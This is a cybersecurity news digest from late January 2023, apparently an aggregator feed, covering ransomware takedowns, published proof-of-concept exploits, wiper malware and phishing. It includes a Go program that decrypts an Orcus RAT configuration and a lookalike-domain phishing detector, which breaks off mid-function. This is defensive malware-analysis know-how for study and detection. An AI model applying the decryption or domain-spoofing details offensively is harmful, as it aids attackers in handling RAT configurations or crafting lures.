                The threat actors associated with the Gootkit malware have made "notable changes" to their toolset, adding new components and obfuscations to their infection chains. Google-owned Mandiant is monitoring the activity cluster under the moniker UNC2565, noting that the usage of the malware is "exclusive to this group." Gootkit, also called Gootloader, is spread through compromised websites that



                Week in review: ChatGPT cybersecurity, critical RCE vulnerabilities found in git, Riot Games breached

                industry ciber
                2023-01-29 https://www.helpnetsecurity.com/2023/01/29/week-in-review-chatgpt-cybersecurity-critical-rce-vulnerabilities-found-in-git-riot-games-breached/

                Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: BSidesZG 2023: Strengthening the infosec community in Croatia’s capital In March 2023, Zagreb will be added to the (already long) list of cities where information security professionals and enthusiasts can share their knowledge with peers at a Security BSides conference. We’ve talked with BSidesZG organizer Ante Jurjevic to find out what’s in store for those who attend. How to tackle … More

                The post Week in review: ChatGPT cybersecurity, critical RCE vulnerabilities found in git, Riot Games breached appeared first on Help Net Security.

                "

                Autosummary: Critical VMware vRealize Log Insight flaws patched (CVE-2022-31706, CVE-2022-31704) VMware has fixed two critical (CVE-2022-31706, CVE-2022-31704) and two important (CVE-2022-31710, CVE-2022-31711) security vulnerabilities in VMware vRealize Log Insight, its multi-cloud solution for centralized log management, operational visibility and intelligent analytics. Why most IoT cybersecurity strategies give zero hope for zero trust In this Help Net Security video, Denny LeCompte, CEO at Portnox, discusses how IoT has been difficult to profile accurately and why zero trust strategies fail when applied to IoT. Understanding your attack surface makes it easier to prioritize technologies and systems Organizations need to strike the balance of carrying out enough due diligence before patching, and then patching as quickly as possible to defend themselves against emerging threats. "


                Watch out! Experts plan to release VMware vRealize Log RCE exploit next week

                exploits
                2023-01-29 https://securityaffairs.com/141495/hacking/poc-exploit-vmware-vrealize-log-rce.html

                Horizon3’s Attack Team made the headlines again announcing the release of a PoC exploit code for remote code execution in VMware vRealize Log. Researchers from the Horizon3’s Attack Team announced the release of PoC exploit code for remote code execution in VMware vRealize Log. The PoC exploit code will trigger a series of flaws in […]

                The post Watch out! Experts plan to release VMware vRealize Log RCE exploit next week appeared first on Security Affairs.

                "

                Autosummary: Exploitation of multiple vulnerabilities affecting #VMware vRealize Log Insight leads to unauth RCE 🔺 CVE-2022-31704, CVE-2022-31706, CVE-2022-31711 🔺 IOC Blog tomorrow 🔺 POC / Deep-Dive Blog next week See VMware Security Advisory: https://t.co/tldhMQPoPK pic.twitter.com/VesGlE8u5R — Horizon3 Attack Team (@Horizon3Attack) January 26, 2023 The PoC exploit code will trigger a series of flaws in VMware vRealize Log to achieve remote code execution on vulnerable installs. "


                The Week in Ransomware - January 27th 2023 - "We hacked the hackers"

                exploits ransomware
                2023-01-28 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-january-27th-2023-we-hacked-the-hackers/
                For the most part, this week has been relatively quiet regarding ransomware attacks and research — that is, until the FBI announced the disruption of the Hive ransomware operation. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @PolarToffee, @demonslay335, @LawrenceAbrams, @malwrhunterteam, @BleepinComputer, @Ionut_Ilascu, @Seifreed, @serghei, @struppigel, @billtoulas, @fwosar, @TrendMicro, @pcrisk, @1ZRR4H, @wdormann, and @ffforward.


                Ukraine Hit with New Golang-based "SwiftSlicer" Wiper Malware in Latest Cyber Attack

                exploits
                2023-01-28 https://thehackernews.com/2023/01/ukraine-hit-with-new-golang-based.html
                Ukraine has come under a fresh cyber onslaught from Russia that involved the deployment of a previously undocumented Golang-based data wiper dubbed SwiftSlicer. ESET attributed the attack to Sandworm, a nation-state group linked to Military Unit 74455 of the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). "Once executed it deletes shadow

                Autosummary: The sophistication of the threat actor is evidenced by its multiple distinct kill chains, which comprise a wide variety of custom tools such as BlackEnergy, GreyEnergy, Industroyer, NotPetya, Olympic Destroyer, Exaramel, and Cyclops Blink. In 2022 alone, coinciding with Russia's military invasion of Ukraine, Sandworm has unleashed WhisperGate, HermeticWiper, IsaacWiper, CaddyWiper, Industroyer2, Prestige, and RansomBoggs against critical infrastructure in Ukraine.


                Researchers to release VMware vRealize Log RCE exploit, patch now

                exploits
                2023-01-28 https://www.bleepingcomputer.com/news/security/researchers-to-release-vmware-vrealize-log-rce-exploit-patch-now/
                Security researchers with Horizon3's Attack Team will release next week an exploit targeting a vulnerability chain for gaining remote code execution on unpatched VMware vRealize Log Insight appliances. [...]

                Autosummary: VMware vRealize Log Insight unauth RCE exploit (Horizon3). "This vulnerability is easy to exploit however, it requires the attacker to have some infrastructure setup to serve malicious payloads," the researchers said.


                Hive! Hive! Hive! Ransomware site submerged by FBI

                exploits ransomware
                2023-01-28 https://www.malwarebytes.com/blog/news/2023/01/hive-ransomware-infrastructure-taken-down

                Categories: News, Ransomware. Tags: DoJ, FBI, Europol, Hive, ransomware, RDP, Patch management, Vulnerability, phishing

                The DoJ, FBI, and Europol have released details about a months-long international disruption campaign against the Hive ransomware group.

                The post Hive! Hive! Hive! Ransomware site submerged by FBI appeared first on Malwarebytes Labs.

                "

                Autosummary: Known attacks by ransomware gangs, based on data leaked since April 2022 In August 2021, the FBI published a warning about Hive ransomware, sharing tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), and mitigation advice. "


                Copycat Criminals mimicking Lockbit gang in northern Europe

                ransomware
                2023-01-28 https://securityaffairs.com/141491/cyber-crime/crooks-mimicking-lockbit-gang.html

                Recent reports of LockBit locker-based attacks against northern European SMBs indicate that local crooks have started using LockBit locker variants. Executive summary: recently, there has been a significant increase in ransomware attacks targeting companies in northern Europe. These attacks are being carried out using the LockBit locker, which is known to be in use […]

                The post Copycat Criminals mimicking Lockbit gang in northern Europe appeared first on Security Affairs.

                "

                Autosummary: "


                Iron Bow acquires GuardSight to enhance its cybersecurity solutions

                ciber
                2023-01-27 https://www.helpnetsecurity.com/2023/01/27/iron-bow-guardsight/

                Iron Bow Technologies acquired GuardSight, a cybersecurity operations as a service (SECOPS), and managed detection and response (MDR) company that serves businesses and organizations across the U.S. The acquisition of GuardSight will enhance Iron Bow’s existing cybersecurity solutions portfolio, combining its public-sector cybersecurity engineering capabilities with GuardSight’s private-sector SECOPS and MDR capabilities. With GuardSight, Iron Bow will provide a more holistic cybersecurity offering that enables government agencies, private enterprises, and organizations to modernize their cybersecurity … More

                The post Iron Bow acquires GuardSight to enhance its cybersecurity solutions appeared first on Help Net Security.

                "

                Autosummary: "


                Hemp makes a comeback in the construction industry

                industry
                2023-01-27 https://www.bbc.co.uk/news/business-63666195?at_medium=RSS&at_campaign=KARANGA
                A revival of hemp cultivation in Portugal has spurred the use of hemp blocks in construction. "

                Autosummary: "


                Open source skills continue to be in high demand

                ransomware
                2023-01-27 https://www.helpnetsecurity.com/2023/01/27/open-source-skills/

                80% of organizations increased their use of open source software over the last 12 months, according to Perforce Software and the Open Source Initiative. Four out of five companies rely on OSS for a wide range of business-critical applications including data and database management, containers and container orchestration, and DevOps and SDLC tooling. The report reveals, however, that some obstacles persist. In every technology category surveyed, organizations repeatedly cited lack of personnel with expertise as … More

                The post Open source skills continue to be in high demand appeared first on Help Net Security.

                "

                Autosummary: “Clearly, more technical support is needed for open source technologies, as personnel experience and proficiency is highly ranked again this year as a support concern across organizations regardless of size,” said Javier Perez, Chief OSS Evangelist at Perforce Software. "


                BlackCat Ransomware gang stole secret military data from an industrial explosives manufacturer

                exploits ransomware industry
                2023-01-27 https://securityaffairs.com/141409/data-breach/blackcat-ransomware-solar-industries-india.html

                The BlackCat Ransomware group claims to have hacked SOLAR INDUSTRIES INDIA and to have stolen 2TB of “secret military data.” The BlackCat Ransomware gang added SOLAR INDUSTRIES INDIA to the list of victims published on its Tor leak site. The company is a globally recognised industrial explosives manufacturer, it provides complete blasting solutions, including packaged, […]

                The post BlackCat Ransomware gang stole secret military data from an industrial explosives manufacturer appeared first on Security Affairs.

                "

                Autosummary: "


                Experts Uncover the Identity of Mastermind Behind Golden Chickens Malware Service

                exploits
                2023-01-27 https://thehackernews.com/2023/01/experts-uncover-identity-of-mastermind.html
                Cybersecurity researchers have discovered the real-world identity of the threat actor behind Golden Chickens malware-as-a-service, who goes by the online persona "badbullzvenom." eSentire's Threat Response Unit (TRU), in an exhaustive report published following a 16-month-long investigation, said it "found multiple mentions of the badbullzvenom account being shared between two people." The "

                Autosummary: "'Chuck,' who uses multiple aliases for his underground forum, social media, and Jabber accounts, and the threat actor claiming to be from Moldova, have gone to great lengths to disguise themselves," eSentire researchers Joe Stewart and Keegan Keplinger said. "


                Researchers Discover New PlugX Malware Variant Spreading via Removable USB Devices

                exploits
                2023-01-27 https://thehackernews.com/2023/01/researchers-discover-new-plugx-malware.html
                Cybersecurity researchers have uncovered a PlugX sample that employs sneaky methods to infect attached removable USB media devices in order to propagate the malware to additional systems. "This PlugX variant is wormable and infects USB devices in such a way that it conceals itself from the Windows operating file system," Palo Alto Networks Unit 42 researchers Mike Harbison and Jen Miller-Osborn "

                Autosummary: The shortcut file, for its part, carries the same name as that of the USB device and appears as a drive icon, with the existing files or directories on the root of the removable device moved to a hidden folder created inside the "shortcut" folder. "


                3 Lifehacks While Analyzing Orcus RAT in a Malware Sandbox

                exploits
                2023-01-27 https://thehackernews.com/2023/01/3-lifehacks-while-analyzing-orcus-rat.html
                Orcus is a Remote Access Trojan with some distinctive characteristics. The RAT allows attackers to create plugins and offers a robust core feature set that makes it quite a dangerous malicious program in its class. RAT is quite a stable type that always makes it to the top (see ANY.RUN's top malware types in 2022). That's why you'll definitely come across this type in your practice, and the Orcus "

                Autosummary: How to decrypt data: (1) generate the key from a given string using Microsoft's PBKDF1 implementation; (2) decode the data from Base64; (3) apply the generated key to decrypt the data via the AES-256 algorithm in CBC mode. Today we investigate the .NET sample that you can download for free from the ANY.RUN database (SHA-256: 258a75a4dee6287ea6d15ad7b50b35ac478c156f0d8ebfc978c6bbbbc4d441e1). 1 — Get to know Orcus classes: you should start by checking the malware's classes, where you can find the hidden program's characteristics. Get it all at once in a malware sandbox: malware analysis is not a piece of cake; it definitely takes time and effort to crack a sample. "
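The three decryption steps above (PBKDF1 key derivation, Base64 decoding, AES-256-CBC) can be reproduced outside the sandbox. The Go program below is an added example written for this page, not ANY.RUN's tooling or code from the Orcus sample: it re-implements .NET's PasswordDeriveBytes (PBKDF1 over SHA-1, plus Microsoft's non-standard extension for requests longer than one digest, which is what makes a 32-byte AES-256 key come out of a 20-byte hash), then Base64-decodes and decrypts a blob. The password string, the salt, the configuration JSON and the IV layout (first 16 bytes of the decoded blob) are assumptions constructed for the demo and must be read out of the real sample's classes; 100 iterations is the PasswordDeriveBytes default.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/sha1"
	"encoding/base64"
	"errors"
	"fmt"
	"strconv"
)

// sampleConfig is a constructed stand-in for the RAT configuration; it is not
// taken from the analysed sample.
const sampleConfig = `{"host":"198.51.100.7","port":4782,"mutex":"demo"}`

// passwordDeriveBytes reproduces .NET PasswordDeriveBytes.GetBytes with SHA-1:
// plain PBKDF1 (PKCS#5 v1.5) for the first 20 bytes, then Microsoft's
// extension for longer requests. base = SHA1 applied (iterations-1) times to
// password||salt; block 0 = SHA1(base); block i (i>=1) = SHA1(ASCII(i)||base).
func passwordDeriveBytes(password, salt []byte, iterations, length int) []byte {
	d := sha1.Sum(append(append([]byte{}, password...), salt...))
	base := d[:]
	for i := 1; i < iterations-1; i++ {
		s := sha1.Sum(base)
		base = s[:]
	}
	out := make([]byte, 0, length+sha1.Size)
	for block := 0; len(out) < length; block++ {
		in := base
		if block > 0 {
			in = append([]byte(strconv.Itoa(block)), base...)
		}
		s := sha1.Sum(in)
		out = append(out, s[:]...)
	}
	return out[:length]
}

// pkcs7Unpad validates and strips PKCS#7 padding; a bad pad usually means a
// wrong key, a wrong IV or a truncated blob.
func pkcs7Unpad(b []byte) ([]byte, error) {
	if len(b) == 0 || len(b)%aes.BlockSize != 0 {
		return nil, errors.New("plaintext is not block aligned")
	}
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize {
		return nil, errors.New("invalid padding length")
	}
	for _, c := range b[len(b)-n:] {
		if int(c) != n {
			return nil, errors.New("invalid padding bytes")
		}
	}
	return b[:len(b)-n], nil
}

// decryptConfig is steps 2 and 3: Base64-decode, then AES-256-CBC decrypt.
// Assumption for this demo: the IV is the first 16 bytes of the decoded blob.
func decryptConfig(b64 string, key []byte) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	if len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, errors.New("blob too short or not block aligned")
	}
	block, err := aes.NewCipher(key) // a 32-byte key selects AES-256
	if err != nil {
		return nil, err
	}
	iv, ct := raw[:aes.BlockSize], raw[aes.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	return pkcs7Unpad(pt)
}

// encryptConfig is the inverse, used here only to build the demo blob the way
// a builder would embed it (IV || ciphertext, Base64).
func encryptConfig(plaintext, key, iv []byte) (string, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return "", err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return base64.StdEncoding.EncodeToString(append(append([]byte{}, iv...), ct...)), nil
}

func main() {
	// Constructed password and salt; 100 iterations is the .NET default.
	key := passwordDeriveBytes([]byte("orcus-demo-password"), []byte("demo-salt"), 100, 32)
	blob, _ := encryptConfig([]byte(sampleConfig), key, bytes.Repeat([]byte{0x42}, aes.BlockSize))
	cfg, err := decryptConfig(blob, key)
	if err != nil {
		fmt.Println("decrypt failed:", err)
		return
	}
	fmt.Printf("key %x\nconfig %s\n", key, cfg)
}
```

The extension matters in practice: a PBKDF1 implementation from another library will return the same first 20 bytes but a different tail, so the AES-256 key will be wrong and the padding check will fail even though the password and salt are right.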


                British Cyber Agency Warns of Russian and Iranian Hackers Targeting Key Industries

                rusia-ucrania
                2023-01-27 https://thehackernews.com/2023/01/british-cyber-agency-warns-of-russian.html
                The U.K. National Cyber Security Centre (NCSC) on Thursday warned of spear-phishing attacks mounted by Russian and Iranian state-sponsored actors for information-gathering operations. "The attacks are not aimed at the general public but targets in specified sectors, including academia, defense, government organizations, NGOs, think tanks, as well as politicians, journalists and activists," the "

                Autosummary: "The attacks are not aimed at the general public but targets in specified sectors, including academia, defense, government organizations, NGOs, think tanks, as well as politicians, journalists and activists," the NCSC said. "


                Peru unrest: Police to dismantle roadblocks set by protesters

                latam
                2023-01-27 https://www.bbc.co.uk/news/world-latin-america-64421312?at_medium=RSS&at_campaign=KARANGA
                The government says security forces will take down barricades set up by opponents of President Dina Boluarte. "

                Autosummary: "


                PlugX malware hides on USB devices to infect new Windows hosts

                exploits
                2023-01-27 https://www.bleepingcomputer.com/news/security/plugx-malware-hides-on-usb-devices-to-infect-new-windows-hosts/
                Security researchers have analyzed a variant of the PlugX malware that can hide malicious files on removable USB devices and then infect the Windows hosts they connect to. [...] "

                Autosummary: Comparison between clean and infected USB drives (Unit 42) During their research, the Unit 42 team has also discovered a document-stealing variant of the PlugX malware that targets USB drives, too, but has the added capability of copying PDF and Microsoft Word documents onto a folder in the hidden directory called da520e5. "


                Fugitive Gillespie brothers may have come to harm in Brazil

                latam
                2023-01-27 https://www.bbc.co.uk/news/uk-scotland-64425109?at_medium=RSS&at_campaign=KARANGA
                Detectives confirm they have shared their concerns with the families of James and Barry Gillespie. "

                Autosummary: "


                SwiftSlicer: New destructive wiper malware strikes Ukraine

                exploits
                2023-01-27 https://www.welivesecurity.com/2023/01/27/swiftslicer-new-destructive-wiper-malware-ukraine/

                Sandworm continues to conduct attacks against carefully chosen targets in the war-torn country

                The post SwiftSlicer: New destructive wiper malware strikes Ukraine appeared first on WeLiveSecurity

                "

                Autosummary: When it comes to SwiftSlicer’s method of destruction, ESET researchers had this to say: “Once executed it deletes shadow copies, recursively overwrites files located in %CSIDL_SYSTEM%\drivers, %CSIDL_SYSTEM_DRIVE%\Windows\NTDS and other non-system drives and then reboots computer. "


                Haiti police riot on streets after gang attacks on officers

                industry
                2023-01-27 https://www.bbc.co.uk/news/world-latin-america-64424601?at_medium=RSS&at_campaign=KARANGA
                The protesters blame the government for not taking action over a number of gang attacks on police stations and officers. "

                Autosummary: "


                Smashing Security podcast #306: No Fly lists, cell phones, and the end of ransomware riches?

                exploits ransomware
                2023-01-26 https://grahamcluley.com/smashing-security-podcast-306/
                What are prisoners getting up to with mobile phones? Why might ransomware no longer be generating as much revenue for cybercriminals? And how on earth did an airline leave the US government's "No Fly" list accessible for anyone in the world to download? All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by Maria Varmazis. "

                Autosummary: Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Maria Varmazis – @mvarmazis Episode links: Sponsored by: Bitwarden – Bitwarden vaults are end-to-end encrypted with zero-knowledge encryption, including, the URLs for the websites you have accounts for. "


                Iranian and Russian hackers targeting politicians and journalists, warn UK officials

                rusia-ucrania
                2023-01-26 https://www.bbc.co.uk/news/uk-64405220?at_medium=RSS&at_campaign=KARANGA
                Politicians and journalists are being targeted with espionage attacks, the UK government is warning. "

                Autosummary: "


                How businesses can bolster their cybersecurity defenses with open source

                ciber
                2023-01-26 https://www.helpnetsecurity.com/2023/01/26/how-businesses-can-bolster-their-cybersecurity-defenses-with-open-source/

                Open-source software enables better security for both large and small organizations. It is the foundation of today’s society and is found throughout a modern application stack, from the operating system to networking functions. It’s estimated that around 90% of organizations use open source in some way, according to GitHub’s 2022 Octoverse report. Open-source software can be examined by everyone, both attackers and defenders. But this does not necessarily give attackers the upper hand. Rather, it … More

                The post How businesses can bolster their cybersecurity defenses with open source appeared first on Help Net Security.

                "

                Autosummary: The development of open-source security This year has seen moves by governments and Big Tech companies to ensure the security of open-source software, with the OpenSSF (Open Source Security Foundation) announcing initiatives to improve the security of open source software, including a $30 million fund with a 10-point plan to boost the security of open source software. Alongside open source, businesses should adopt further best practice measures for secure software, such as code reviews, scanning for vulnerabilities, visibility into the system and knowing the attack surface – just a few ways that code, packages, and systems can be evaluated for security. "


                ChatGPT is a bigger threat to cybersecurity than most realize

                ciber
                2023-01-26 https://www.helpnetsecurity.com/2023/01/26/chatgpt-cybersecurity-threat/

                A language-generating AI model called ChatGPT, available for free, has taken the internet by storm. While AI has the potential to help IT and security teams become more efficient, it also enables threat actors to develop malware. In this interview with Help Net Security, Daniel Spicer, Chief Security Officer for Ivanti, talks about what this technology means for cybersecurity. What are some reasons for concern regarding the application of AI to cybersecurity? The tech industry … More

                The post ChatGPT is a bigger threat to cybersecurity than most realize appeared first on Help Net Security.

                "

                Autosummary: Currently, the value of generative AI, like ChatGPT and DALL-E, is lopsided in favor of threat actors. In this interview with Help Net Security, Daniel Spicer, Chief Security Officer for Ivanti, talks about what this technology means for cybersecurity. On the flip side, AI has the potential to help IT and security teams become more efficient and effective, enabling automated and/or semi-automated vulnerability detection and remediation as well as risk-based prioritization. That’s alarming, because it expands not only the volume of potential threats and number of potential threat actors, but also makes it more likely that people who have little to no idea what they’re doing will be out there joining the fray. "


                Supply chain attacks caused more data compromises than malware

                exploits
                2023-01-26 https://www.helpnetsecurity.com/2023/01/26/data-compromises-2022/

                The first half of 2022 saw fewer compromises reported due in part to Russia-based cybercriminals distracted by the war in Ukraine and volatility in the cryptocurrency markets, according to the Identity Theft Resource Center. However, data compromises steadily increased in the second half of 2022. The number of victims impacted (422.1 million) increased by 41.5% from 2021. For 11 of the 12 months in 2022, the estimated number of data compromise victims was trending downward … More

                The post Supply chain attacks caused more data compromises than malware appeared first on Help Net Security.

                "

                Autosummary: Other findings Data breach notices suddenly lacked details, resulting in increased risk for individuals and businesses, as well as uncertainty about the number of data breaches and victims. "


                Perimeter 81’s malware protection defends users from internet-borne threats

                exploits
                2023-01-26 https://www.helpnetsecurity.com/2023/01/26/perimeter-81-malware-protection/

                With continued transition to cloud services to support remote work, the threat of malware continues to grow, expanding each company’s attack surface. The first half of 2022 saw 2.8 billion malware attacks in which more than 270,000 “never-seen-before” malware variants were used, according to SonicWall’s mid-year report, up 45% from last year. Perimeter 81 added malware protection to strengthen its security offering and better protect its customers from internet-borne risks. Perimeter 81’s malware protection requires … More

                The post Perimeter 81’s malware protection defends users from internet-borne threats appeared first on Help Net Security.

                "

                Autosummary: Clients can use malware protection to secure their users from any internet-based threat like viruses, trojans, worms, rootkits, keyloggers, phishing, adware, spyware, and advanced persistent threats that can damage the organization via ransomware, extortion, data breaches, and more. "


                Malwarebytes Mobile Security for Business protects organizations’ mobile devices

                exploits
                2023-01-26 https://www.helpnetsecurity.com/2023/01/26/malwarebytes-mobile-security-for-business/

                Malwarebytes has announced the upcoming Malwarebytes Mobile Security for Business, extending its endpoint protection capabilities to professional mobile devices. From corporate organizations to educational institutions, the increasing number of connected mobile devices introduces security risks to users and networks. With 25% of mobile apps containing at least one high-risk security flaw, IT administrators are facing a rapidly growing security threat as mobile device usage increases in academic and business environments. Traditionally, organizations have focused endpoint … More

                The post Malwarebytes Mobile Security for Business protects organizations’ mobile devices appeared first on Help Net Security.

                "

                Autosummary: "


                Experts warn of a surge of attacks exploiting a Realtek Jungle SDK RCE (CVE-2021-35394)

                exploits
                2023-01-26 https://securityaffairs.com/141359/hacking/realtek-sdk-flaw-cve-2021-35394-botnets.html

                Experts warn of a spike in the attacks that between August and October 2022 attempted to exploit a Realtek Jungle SDK RCE (CVE-2021-35394). Palo Alto Networks researchers reported that between August and October 2022 the number of attacks that attempted to exploit a Realtek Jungle SDK RCE (CVE-2021-35394) (CVSS score 9.8) accounted for more than […]

                The post Experts warn of a surge of attacks exploiting a Realtek Jungle SDK RCE (CVE-2021-35394) appeared first on Security Affairs.

                "

                Autosummary: "


                Colombian drug lord Otoniel pleads guilty in US court

                latam
                2023-01-26 https://www.bbc.co.uk/news/world-latin-america-64399222?at_medium=RSS&at_campaign=KARANGA
                Dairo Antonio Úsuga, also known as Otoniel, led Colombia's Gulf cartel before his arrest in 2021. "

                Autosummary: "


                UK warns of increased attacks from Russian, Iranian hackers

                rusia-ucrania
                2023-01-26 https://www.bleepingcomputer.com/news/security/uk-warns-of-increased-attacks-from-russian-iranian-hackers/
                The U.K. National Cyber Security Centre (NCSC) has issued a warning of Russian and Iranian state-sponsored hackers increasingly targeting organizations and individuals. [...] "

                Autosummary: “The attacks are not aimed at the general public but targets in specified sectors, including academia, defense, government organizations, NGOs, think tanks, as well as politicians, journalists, and activists” - U.K. NCSC SEABORGIUM, also known as ‘TA446,’ is a Russian state-sponsored threat group that targeted NATO countries last summer. "


                Hive ransomware disrupted after FBI hacks gang's systems

                exploits ransomware
                2023-01-26 https://www.bleepingcomputer.com/news/security/hive-ransomware-disrupted-after-fbi-hacks-gangs-systems/
                Today, the Hive ransomware Tor payment and data leak sites were seized as part of an international law enforcement operation involving the US Department of Justice, FBI, Secret Service, Europol, and Germany's BKA and Polizei. [...] "

                Autosummary: The ransomware gang's Tor web sites now display a seizure notice listing a wide range of other countries involved in the law enforcement operation, including Germany, Canada, France, Lithuania, Netherlands, Norway, Portugal, Romania, Spain, Sweden, and the United Kingdom. "


                Hive ransomware leak site and decryption keys seized in police sting

                exploits ransomware
                2023-01-26 https://grahamcluley.com/hive-ransomware-leak-site-seized-in-police-sting/
                Websites used by the Hive ransomware-as-a-service gang to extort ransoms and leak data stolen from corporate victims have been seized in a joint operation involving police around the world. "

                Autosummary: "


                ShinyHunters suspect extradited to United States from Morocco, could face 116 years in jail if convicted

                government
                2023-01-26 https://www.tripwire.com/state-of-security/shinyhunters-suspect-extradited-united-states
                A 22-year-old suspected of being "Seyzo", a member of the ShinyHunters cybercrime gang, has been extradited from Morocco to the United States, where - if convicted - he could face up to 116 years in prison. The ShinyHunters gang became notorious in 2020, following a series of data breaches that impacted over 60 companies - including Microsoft. Read more in my article on the Tripwire State of Security blog. "

                Autosummary: "


                Authorities shut down HIVE ransomware infrastructure, provide decryption tools

                exploits ransomware
                2023-01-26 https://www.helpnetsecurity.com/2023/01/26/hive-ransomware-shut-down/

                Europol supported the German, Dutch and US authorities in taking down the infrastructure of the prolific HIVE ransomware. This international operation involved authorities from 13 countries in total. Law enforcement identified the decryption keys and shared them with many victims, helping them regain access to their data without paying the cybercriminals. In the last year, HIVE ransomware has been identified as a major threat as it has been used to compromise and encrypt the data … More

                The post Authorities shut down HIVE ransomware infrastructure, provide decryption tools appeared first on Help Net Security.

                "

                Autosummary: Since June 2021, criminals have used HIVE ransomware to target many businesses and critical infrastructure sectors, including government facilities, telecommunication companies, manufacturing, information technology, and healthcare and public health. Europol also provided analytical support linking available data to various criminal cases within and outside the EU, and supported the investigation through cryptocurrency, malware, decryption and forensic analysis. "


                Researchers release PoC exploit for critical Windows CryptoAPI bug (CVE-2022-34689)

                exploits
                2023-01-26 https://www.helpnetsecurity.com/2023/01/26/poc-exploit-cve-2022-34689/

                Akamai researchers have published a PoC exploit for a critical vulnerability (CVE-2022-34689) in Windows CryptoAPI, which validates public key certificates. “An attacker could manipulate an existing public x.509 certificate to spoof their identity and perform actions such as authentication or code signing as the targeted certificate,” Microsoft said in October 2022, when they announced fixes for vulnerable Windows and Windows Server versions. The vulnerability was actually patched in August 2022, but its existence only revealed … More

                The post Researchers release PoC exploit for critical Windows CryptoAPI bug (CVE-2022-34689) appeared first on Help Net Security.

                "

                Autosummary: CVE-2022-34689 exploitation. To exploit CVE-2022-34689, a first certificate, generated so as to enable a chosen-prefix collision attack and correctly signed and verified, must first be cached by CryptoAPI; a second certificate with the same MD5 thumbprint is then trusted immediately, because Microsoft does not re-check cached certificates. "


                Hive Ransomware Infrastructure Seized in Joint International Law Enforcement Effort

                exploits ransomware
                2023-01-26 https://thehackernews.com/2023/01/hive-ransomware-infrastructure-seized.html
                The infrastructure associated with the Hive ransomware-as-a-service (RaaS) operation has been seized as part of a coordinated law enforcement effort involving 13 countries. "Law enforcement identified the decryption keys and shared them with many of the victims, helping them regain access to their data without paying the cybercriminals," Europol said in a statement. The U.S. Department of "

                Autosummary: "


                Researchers Release PoC Exploit for Windows CryptoAPI Bug Discovered by NSA

                exploits
                2023-01-26 https://thehackernews.com/2023/01/researchers-release-poc-exploit-for.html
                Proof-of-concept (PoC) code has been released for a now-patched high-severity security flaw in the Windows CryptoAPI that the U.S. National Security Agency (NSA) and the U.K. National Cyber Security Centre (NCSC) reported to Microsoft last year. Tracked as CVE-2022-34689 (CVSS score: 7.5), the spoofing vulnerability was addressed by the tech giant as part of Patch Tuesday updates released in "

                Autosummary: "


                Hive Ransomware Tor leak site apparently seized by law enforcement

                exploits ransomware
                2023-01-26 https://securityaffairs.com/141374/cyber-crime/hive-ransomware-leak-site-seized.html

                The leak site of the Hive ransomware gang was seized due to an international operation conducted by law enforcement in ten countries. The Tor leak site used by Hive ransomware operators has been seized as part of an international operation conducted by law enforcement in 10 countries. “The Federal Bureau of Investigation seized this site […]

                The post Hive Ransomware Tor leak site apparently seized by law enforcement appeared first on Security Affairs.

                "

                Autosummary: "


                Bitwarden password vaults targeted in Google ads phishing attack

                financial
                2023-01-26 https://www.bleepingcomputer.com/news/security/bitwarden-password-vaults-targeted-in-google-ads-phishing-attack/
                Bitwarden and other password managers are being targeted in Google ads phishing campaigns to steal users' password vault credentials. [...] "

                Autosummary: The domain used in the ad was "appbitwarden.com" and, when clicked, redirected users to the site "bitwardenlogin.com." The page at "bitwardenlogin.com" was an exact replica of the legitimate Bitwarden Web Vault login page. In our tests, the phishing page will accept credentials and, once submitted, redirect users to the legitimate Bitwarden login page. "
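Both phishing hosts in the report carry the brand name inside a domain that Bitwarden does not own, which is a pattern a proxy-log check can catch. The Go program below is an added example (not BleepingComputer's or Bitwarden's code): it scans constructed proxy log lines for hosts that contain a protected brand token while their registrable domain is outside an allowlist, flagging "appbitwarden.com", "bitwardenlogin.com" and a brand-as-subdomain host that the same rule also covers. The log format, user names, the extra hosts and the one-entry allowlist are assumptions; the two-label registrable-domain cut ignores the public suffix list, which a production version must consult.

```go
package main

import (
	"fmt"
	"strings"
)

// sampleProxyLog holds constructed lines ("<timestamp> <user> <host>"), not
// real traffic. The two phishing hosts are the ones named in the article; the
// remaining hosts and users are made up for the demo.
const sampleProxyLog = `2023-01-26T09:12:01Z alice vault.bitwarden.com
2023-01-26T09:12:44Z bob appbitwarden.com
2023-01-26T09:13:02Z bob bitwardenlogin.com
2023-01-26T09:14:10Z carol bitwarden.com
2023-01-26T09:15:00Z dave mail.example.com
2023-01-26T09:16:31Z erin login.bitwarden.com.evil-cdn.net`

// brandAllowlist maps a brand token to the registrable domains the vendor
// actually controls (assumed allowlist: a single domain for the demo).
var brandAllowlist = map[string][]string{
	"bitwarden": {"bitwarden.com"},
}

// Alert is one flagged request.
type Alert struct {
	Time, User, Host, Brand string
}

// registrableDomain lowercases the host and keeps its last two labels. This
// ignores the public suffix list ("example.co.uk" would come out as "co.uk");
// a production check should use a PSL-aware library instead.
func registrableDomain(host string) string {
	h := strings.ToLower(strings.TrimSuffix(host, "."))
	labels := strings.Split(h, ".")
	if len(labels) < 2 {
		return h
	}
	return strings.Join(labels[len(labels)-2:], ".")
}

// isLookalike reports whether host carries a brand token anywhere in its name
// while its registrable domain is not one the brand owns. That covers both
// brand-in-registrable-domain lures ("appbitwarden.com") and brand-as-subdomain
// lures ("login.bitwarden.com.evil-cdn.net").
func isLookalike(host string) (string, bool) {
	h := strings.ToLower(host)
	rd := registrableDomain(h)
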